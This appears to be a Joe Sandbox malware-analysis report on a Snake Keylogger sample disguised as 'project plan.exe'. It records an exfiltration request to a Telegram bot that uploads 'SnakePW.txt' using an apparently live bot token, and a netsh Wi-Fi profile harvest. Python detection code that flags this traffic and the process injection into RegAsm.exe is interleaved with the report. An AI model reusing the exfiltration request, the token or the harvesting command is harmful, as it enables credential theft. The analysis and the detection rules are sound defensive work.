                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | 6132 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 09:27:59.150829077 CEST | 151 | OUT | GET / HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                  Host: checkip.dyndns.org
                                  Connection: Keep-Alive
Jul 3, 2024 09:27:59.836782932 CEST | 320 | IN | HTTP/1.1 200 OK
                                  Date: Wed, 03 Jul 2024 07:27:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 103
                                  Connection: keep-alive
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  X-Request-ID: 512dbe0845334fd3bec92b26f7f0c12a
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 149.154.167.220 | 443 | 6132 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-03 07:28:06 UTC | 352 | OUT | POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6ea
                                  Host: api.telegram.org
                                  Content-Length: 534
                                  Connection: Keep-Alive
2024-07-03 07:28:06 UTC | 534 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 62 31 30 32 36 39 34 61 36 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 31 30 36 34 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 33 2f 30 37 2f 32 30 32 34 20 2f 20 30 33 3a 32 37 3a 35 37 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                  Data Ascii: --------------------------8dc9b102694a6eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:910646Date and Time: 03/07/2024 / 03:27:57Client IP:
2024-07-03 07:28:06 UTC | 388 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Wed, 03 Jul 2024 07:28:06 GMT
                                  Content-Type: application/json
                                  Content-Length: 473
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-03 07:28:06 UTC | 473 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 35 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 36 34 37 32 35 31 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 55 4d 5a 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 75 6d 7a 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 33 36 31 32 38 35 31 36 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 63 65 61 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 39 39 31 36 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79 70 65 22 3a
                                  Data Ascii: {"ok":true,"result":{"message_id":195676,"from":{"id":6064725165,"is_bot":true,"first_name":"BUMZY","username":"bumzy_bot"},"chat":{"id":5361285164,"first_name":"Ocean","type":"private"},"date":1719991686,"document":{"file_name":"SnakePW.txt","mime_type":
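The two sessions above, the checkip.dyndns.org GET sent with a legacy MSIE 6.0 User-Agent and the Bot API sendDocument POST carrying a "SnakePW.txt" part, can be matched mechanically from the request line, headers and multipart body. The Python below is an added example, not Joe Sandbox code and not part of the report. Its sample request, headers and body are constructed to mirror the capture; the bot token and chat_id in it are placeholders, not the values recorded above.

```python
"""Parse and classify the IP-check and Telegram sendDocument sessions.

Added example, not Joe Sandbox code and not part of the report. The sample
request, headers and multipart body are constructed to mirror the capture;
the bot token and chat_id are placeholders, not the values from the report.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API request target: /bot<bot_id>:<secret>/<method>?<params>
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")

# The legacy User-Agent the IP check in the capture was sent with.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"


def parse_bot_request(request_line: str) -> Optional[dict]:
    """Split a request line into bot id, redacted secret, API method and query params."""
    try:
        http_method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None
    parts = urlsplit(target)
    m = BOT_PATH.match(parts.path)
    if m is None:
        return None
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs percent-decodes
    return {
        "http_method": http_method,
        "bot_id": m["bot_id"],
        "secret_prefix": m["secret"][:4] + "...",  # enough to correlate samples, never the full token
        "api_method": m["method"],
        "chat_id": query.get("chat_id"),
        "caption": query.get("caption", ""),
    }


def parse_multipart_document(body: bytes, boundary: str) -> dict:
    """Return filename and declared Content-Type of the 'document' form part."""
    for part in body.split(b"--" + boundary.encode()):
        header_blob, _, _payload = part.partition(b"\r\n\r\n")
        headers = header_blob.decode("latin-1", "replace")
        if not re.search(r'name="document"', headers):
            continue
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"Content-Type:\s*([^\r\n]+)", headers, re.I)
        return {"filename": fname.group(1) if fname else None,
                "content_type": ctype.group(1).strip() if ctype else None}
    return {}


def classify_session(host: str, request_line: str, headers: dict, body: bytes = b"") -> list:
    """Return detection tags for one HTTP session record."""
    tags = []
    if host == "checkip.dyndns.org" and headers.get("User-Agent") == LEGACY_UA:
        tags.append("ip-check-legacy-ua")  # victim public-IP lookup before exfil
    bot = parse_bot_request(request_line) if host == "api.telegram.org" else None
    if bot is not None:
        tags.append("telegram-bot-" + bot["api_method"])
        if "Snake" in bot["caption"]:
            tags.append("snake-keylogger-caption")
        if bot["api_method"] == "sendDocument" and body:
            bmatch = re.search(r"boundary=(\S+)", headers.get("Content-Type", ""))
            doc = parse_multipart_document(body, bmatch.group(1)) if bmatch else {}
            # a .txt credential dump declared as application/x-ms-dos-executable
            if (doc.get("filename") or "").endswith(".txt") and \
                    doc.get("content_type") == "application/x-ms-dos-executable":
                tags.append("mismatched-document-mime")
    return tags


# Constructed sample mirroring the capture (placeholder token and chat_id).
SAMPLE_POST = ("POST /bot1234567890:AAEXAMPLEtokenNOTreal/sendDocument"
               "?chat_id=1000000000&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker HTTP/1.1")
SAMPLE_BOUNDARY = "------------------------8dc9b102694a6ea"
SAMPLE_POST_HEADERS = {"Content-Type": "multipart/form-data; boundary=" + SAMPLE_BOUNDARY,
                       "Host": "api.telegram.org"}
SAMPLE_BODY = b"".join([
    b"--", SAMPLE_BOUNDARY.encode(), b"\r\n",
    b'Content-Disposition: form-data; name="document"; filename="SnakePW.txt"\r\n',
    b"Content-Type: application/x-ms-dos-executable\r\n\r\n",
    b"PW | user | Snake\r\n \r\n\r\nPC Name:910646\r\n",
    b"--", SAMPLE_BOUNDARY.encode(), b"--\r\n",
])

if __name__ == "__main__":
    print(classify_session("checkip.dyndns.org", "GET / HTTP/1.1", {"User-Agent": LEGACY_UA}))
    print(classify_session("api.telegram.org", SAMPLE_POST, SAMPLE_POST_HEADERS, SAMPLE_BODY))
    print(parse_bot_request(SAMPLE_POST))
```

The parser keeps only the first four characters of the bot secret: that is enough to correlate uploads from the same builder across samples without copying a live credential into tickets or detection content. The MIME check keys on exactly what the capture shows, a SnakePW.txt part declared as application/x-ms-dos-executable, which no legitimate Bot API client would produce for a text attachment.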



                                  Target ID:0
                                  Start time:03:27:56
                                  Start date:03/07/2024
                                  Path:C:\Users\user\Desktop\project plan.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\project plan.exe"
                                  Imagebase:0x16754a40000
                                  File size:2'939'959 bytes
                                  MD5 hash:EC263CAFBD93FAEB218574586BF8E45F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:03:27:56
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:03:27:57
                                  Start date:03/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                  Imagebase:0x8e0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Target ID:4
                                  Start time:03:27:57
                                  Start date:03/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                  Imagebase:
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:7
                                  Start time:03:27:58
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                                  Imagebase:0x7ff6ea340000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:03:28:04
                                  Start date:03/07/2024
                                  Path:C:\Windows\SysWOW64\netsh.exe
                                  Wow64 process (32bit):true
                                  Commandline:"netsh" wlan show profile
                                  Imagebase:0x1080000
                                  File size:82'432 bytes
                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:03:28:04
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true
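The process blocks above show the chain the signatures describe: a 64-bit dropper, two RegAsm.exe instances launched without an assembly argument (one of which carries the Snake Keylogger YARA hits and keeps running), and netsh wlan show profile. The Python below is an added example, not Joe Sandbox code and not part of the report. Its records are built from those blocks; the parent links, the network flag and the benign control record are assumptions, since the blocks do not list parent processes and the session tables only identify PID 6132 as a RegAsm.exe instance. The netsh rule also covers the key=clear form of the command, which dumps the stored passphrase and which the report does not show.

```python
"""Process-telemetry rules for the injection and Wi-Fi harvesting chain.

Added example, not Joe Sandbox code and not part of the report. Records are
constructed from the Target blocks in the report. Parent links, the 'network'
flag and the benign control record are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Proc:
    tid: int                  # Joe Sandbox Target ID, used as the process key
    parent: Optional[int]     # assumed parent Target ID (not listed in the report)
    path: str
    cmdline: str
    wow64: Optional[bool]     # True = 32-bit on 64-bit Windows; None = not reported
    has_exited: bool
    network: bool = False     # assumed: appeared in an HTTP/HTTPS session table


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double-quoted tokens."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


WLAN_KEY = re.compile(r"\bkey\s*=\s*clear\b", re.I)


def run_rules(procs) -> list:
    """Return (target_id, tag) pairs for every rule that fires."""
    by_id = {p.tid: p for p in procs}
    hits = []
    for p in procs:
        name = image_name(p.path)
        args = argv(p.cmdline)[1:]
        parent = by_id.get(p.parent) if p.parent is not None else None

        # RegAsm.exe needs an assembly path to do anything; with no arguments it
        # prints usage and exits. A bare instance that keeps running or talks to
        # the network is being used as an injection host.
        if name == "regasm.exe" and not args:
            sev = "high" if (p.network or not p.has_exited) else "medium"
            hits.append((p.tid, "regasm-no-args:" + sev))
            if parent is not None and parent.wow64 is False and p.wow64 is True:
                hits.append((p.tid, "x86-host-spawned-by-x64-parent"))

        # netsh wlan show profile enumerates saved Wi-Fi networks; the same
        # command with key=clear dumps the stored passphrase.
        if name == "netsh.exe" and [a.lower() for a in args[:3]] == ["wlan", "show", "profile"]:
            hits.append((p.tid, "wlan-profile-dump" if WLAN_KEY.search(p.cmdline) else "wlan-profile-enum"))
            if parent is not None and image_name(parent.path) == "regasm.exe" and not argv(parent.cmdline)[1:]:
                hits.append((p.tid, "wlan-query-from-injected-host"))
    return hits


FW = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
SAMPLE = [
    Proc(0, None, r"C:\Users\user\Desktop\project plan.exe", r'"C:\Users\user\Desktop\project plan.exe"', False, True),
    Proc(1, 0, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False, True),
    Proc(3, 0, FW, '"' + FW + '"', True, False, network=True),   # assumed to be PID 6132
    Proc(4, 0, FW, '"' + FW + '"', None, False),
    Proc(7, None, r"C:\Windows\System32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028", False, True),
    Proc(9, 3, r"C:\Windows\SysWOW64\netsh.exe", '"netsh" wlan show profile', True, True),
    Proc(10, 9, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False, True),
    # constructed benign control: a COM registration run with an assembly argument
    Proc(99, None, FW, '"' + FW + '" C:\\build\\MyComLib.dll /codebase', True, True),
]

if __name__ == "__main__":
    for tid, tag in run_rules(SAMPLE):
        print(tid, tag)
```

The bitness rule fires because the dropper reports Wow64 false while the RegAsm.exe host reports Wow64 true: a 64-bit parent starting a 32-bit framework utility with no arguments is the injection step the "Injects a PE file into a foreign processes" signature refers to. The control record (a RegAsm.exe run with an assembly path) produces no finding, which is the behaviour you want before deploying the rule on build hosts that register COM assemblies.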


                                    Execution Graph

                                    Execution Coverage:13.3%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:6
                                    Total number of Limit Nodes:0
execution_graph:
7ff848f134fa -> 7ff848f13509 (VirtualProtect) -> 7ff848f135e1
7ff848f10921 -> 7ff848f1094f (FreeConsole) -> 7ff848f109ce

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ([if$0[if$8[if$@[if$H[if$P[if
                                    • API String ID: 0-2959431512
                                    • Opcode ID: 505e834bada02ca46ea646dd4ec208190717391466daf3c7aaab58b8c6225f90
                                    • Instruction ID: 30c5f9c39fbfa4c70e55180ae5b5ccabbc82f3077e259b96418c915aba175b5d
                                    • Opcode Fuzzy Hash: 505e834bada02ca46ea646dd4ec208190717391466daf3c7aaab58b8c6225f90
                                    • Instruction Fuzzy Hash: 6321C27550AA539FEBC8BB6490316B4B7A1FFA2311F4401BDC94B8B5C2CE1C2C46C742

                                    Control-flow Graph

Control-flow graph of the function at 7ff848f11f30: basic blocks 7ff848f11f30 through 7ff848f15131, with calls to 7ff848f14a50, 7ff848f14aa0, 7ff848f141f8 and 7ff848f14218 and no direct API calls (executed/not-executed colouring omitted).
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: d
                                    • API String ID: 0-2564639436
                                    • Opcode ID: c4afe4fc847aea4b85a3f84a691f3befef9e329ebb75a5b2b35c852c9183f436
                                    • Instruction ID: 624368f825c74bb60121881ab86b0f4927366b0ab653fb180c9b137dd8b26646
                                    • Opcode Fuzzy Hash: c4afe4fc847aea4b85a3f84a691f3befef9e329ebb75a5b2b35c852c9183f436
                                    • Instruction Fuzzy Hash: 37223231A1CA4A4FE759EF2894815B177E2FFA5350F1442BAC45AC71D7EE28EC838784

                                    Control-flow Graph

Control-flow graph of the function at 7ff848f14620: basic blocks 7ff848f1460e through 7ff848f14a8c, with calls to 7ff848f14128, 7ff848f12098, 7ff848f120a0, 7ff848f10208, 7ff848f11f30, 7ff848f14200 and 7ff848f141f8 and no direct API calls (executed/not-executed colouring omitted).
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fish
                                    • API String ID: 0-1064584243
                                    • Opcode ID: 70c6bcf84bb955f58d51e916ff22884945d4dde2631ce233cefe29480395e48d
                                    • Instruction ID: 9358803c2d262a19603c0ce0f41f42e0a4eacee7849c280f2b0254c4ad662b95
                                    • Opcode Fuzzy Hash: 70c6bcf84bb955f58d51e916ff22884945d4dde2631ce233cefe29480395e48d
                                    • Instruction Fuzzy Hash: 19F12731A1DB8A4FE75DAB3898251B577E1FFA6350F0401BED08AC76D3DE28AC068745
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23f145fd40d55c2d68b8edc255a102f4d446fb98b90eb8b95a666dfba2e7fbce
                                    • Instruction ID: e9bd238874f9e82d01d7fb51fdb71bcda8fa7daeb3a218849ed544e288938fec
                                    • Opcode Fuzzy Hash: 23f145fd40d55c2d68b8edc255a102f4d446fb98b90eb8b95a666dfba2e7fbce
                                    • Instruction Fuzzy Hash: EB72B130A1CA098FDBA8FB289455A7977E1FF59341F5401BEE44EC72D2DF28AC418B85
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9660aa3a9a1f13299f44003ae2296e2f4d4c4d520b9484911db3f72c770f658
                                    • Instruction ID: 0d397862a172b6f64345fb3f4fdd155310d1ce2be2aa77f7c6c22b9576a3bf0e
                                    • Opcode Fuzzy Hash: e9660aa3a9a1f13299f44003ae2296e2f4d4c4d520b9484911db3f72c770f658
                                    • Instruction Fuzzy Hash: 2BD15D3191CB868FE31CDB288895175B7E2FF95341F18867ED4C6C32E5DB28A846CB85
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b31d490880e3695af6cdfc642528cb8d5fb914316a57e9ec6c7b7085d2c80c1e
                                    • Instruction ID: 0762965a7d90283a1bbcab0a2b3b6ce5c015edd20866ca565271ffea63085780
                                    • Opcode Fuzzy Hash: b31d490880e3695af6cdfc642528cb8d5fb914316a57e9ec6c7b7085d2c80c1e
                                    • Instruction Fuzzy Hash: A691B230B1C9094FE758FB2894557F977E2EF98390F640479D40EC72D7EE29AC828649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b53c441a5fbff2be9b7c95352ae2f4da6cc2d8d399b3bb837774de841dcd51e6
                                    • Instruction ID: 5451220dcff5c38bf3575d50b3d972d6444ae8c87d18a9b59160955e65f7d6a6
                                    • Opcode Fuzzy Hash: b53c441a5fbff2be9b7c95352ae2f4da6cc2d8d399b3bb837774de841dcd51e6
                                    • Instruction Fuzzy Hash: 6291B230B2C9094FE768FB2894557B973E6EF98381F544479D40EC72D3EF29AC828649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61ac3255585d7373bd89d3de9bb8f283c8633ce0d52686dcc074d13270c54201
                                    • Instruction ID: 4303db53f3446fdb6197daabbf0e200476f1d14613134ae493f6e6c32fa67732
                                    • Opcode Fuzzy Hash: 61ac3255585d7373bd89d3de9bb8f283c8633ce0d52686dcc074d13270c54201
                                    • Instruction Fuzzy Hash: 5641053160D68A0FD31E9B3898261B57BA5EB83320B1582BFD4C7CB1E7DD19A84783D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7244faf19aff1df2c5d94f9dcccba2b3f4bc606f4520ba954c758a53cccb3876
                                    • Instruction ID: fbeccaf584f98c70c3dcaddb259f5dc51ae9106bd5cc58c0bff58ece553d09ac
                                    • Opcode Fuzzy Hash: 7244faf19aff1df2c5d94f9dcccba2b3f4bc606f4520ba954c758a53cccb3876
                                    • Instruction Fuzzy Hash: 6E41F63160D6890FD31EDB7888251A57FA5EB83310F1582BED4C7CB1E7DD28A80683D5

                                    Control-flow Graph

Control-flow graph of the function at 7ff848f134fa: basic blocks 7ff848f134fa through 7ff848f1360f; the block 7ff848f1352e-7ff848f135df calls VirtualProtect (executed/not-executed colouring omitted).
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0

                                    Control-flow Graph (graph omitted; nodes call VirtualProtect)
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
